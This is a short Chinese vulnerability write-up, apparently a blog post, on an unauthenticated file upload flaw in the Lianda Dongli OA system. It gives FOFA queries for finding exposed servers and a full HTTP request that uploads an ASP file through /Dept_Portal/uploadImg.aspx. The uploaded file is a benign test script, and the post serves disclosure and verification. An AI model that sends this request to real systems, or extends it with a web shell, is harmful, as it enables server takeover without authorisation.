Babing
Published on 2024-08-30 / 2 Visits
0
0

L9-3联达动力-OA-文件上传

L9-3联达动力-OA-文件上传

漏洞描述:

联达动力OA /FileManage/UpLoadFile.aspx、/Hosp_Portal/uploadLogo.aspx、/Dept_Portal/uploadImg.aspx等接口处存在未授权文件上传漏洞,未经身份验证的攻击者可利用该漏洞获取服务器控制权限。

网站图片:

image-1.webp

网络测绘:

fofa语法:

(body=“/LKSys_WindowControlScript.js” || body=“onload="LKSYS_PubMaxWin()” || body=“id="lkbLogin" href="javascript:__doPostBack('lkbLogin','')” || (body=“IdentityValidator” && body=“HHCtrlMax”))

漏洞复现:

payload:

POST /Dept_Portal/uploadImg.aspx HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_5) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/76.0.3809.132 Safari/537.36
Content-Type: multipart/form-data; boundary=boundary=00content0boundary00
Accept: text/html, image/gif, image/jpeg, *; q=.2, */*; q=.2
Connection: close

--00content0boundary00
Content-Disposition: form-data; name="DesignId"

1
--00content0boundary00
Content-Disposition: form-data; name="Filedata"; filename="././b.asp"
Content-Type: image/png

<% Response.Write("Hello, World") %>
--00content0boundary00--

效果图:

验证


Comment